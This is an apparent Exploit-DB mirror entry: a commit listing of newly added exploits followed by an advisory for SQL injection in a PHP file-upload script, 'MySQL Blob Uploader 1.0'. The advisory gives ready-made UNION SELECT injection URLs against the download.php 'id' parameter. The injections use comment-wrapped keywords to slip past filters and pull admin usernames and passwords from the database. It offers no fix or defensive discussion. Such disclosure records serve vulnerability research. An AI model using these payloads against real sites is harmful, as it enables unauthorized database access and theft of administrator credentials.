exploit-db-mirror/platforms/php/webapps/41267.txt
Offensive Security 2ff74c7c1b DB: 2017-02-08
9 new exploits

Zookeeper 3.5.2 - Denial of Service
OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service

ThisIsWhyImBroke Clone Script 4.0.0 - 'id' Parameter SQL Injection
Fully Featured News CMS 1.0 - 'id' Parameter SQL Injection
MySQL File Uploader 1.0 - 'id' Parameter SQL Injection
Easy Support Tools 1.0 - 'stt' Parameter SQL Injection
Easy Web Search 3 - 'id' Parameter SQL Injection
FTP Made Easy PRO 1.2 - Arbitrary File Download
Easy File Uploader 1.2 - Arbitrary File Download
Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure
2017-02-08 05:01:17 +00:00

21 lines
No EOL
960 B
Text
Executable file

# # # # #
# Exploit Title: MySQL Blob Uploader - File Upload to Database PHP Script v1.0 - SQL Injection
# Google Dork: N/A
# Date: 07.02.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Buy: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
# Demo: http://demos.nelliwinne.net/MySqlFileUpload/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/download.php?id=[SQL]&t=files
# -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files
# http://localhost/[PATH]/download.php?id=[SQL]&t=images_title
# -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- -&t=images_title
# Etc....Other files have vulnerabilities ...
# # # # #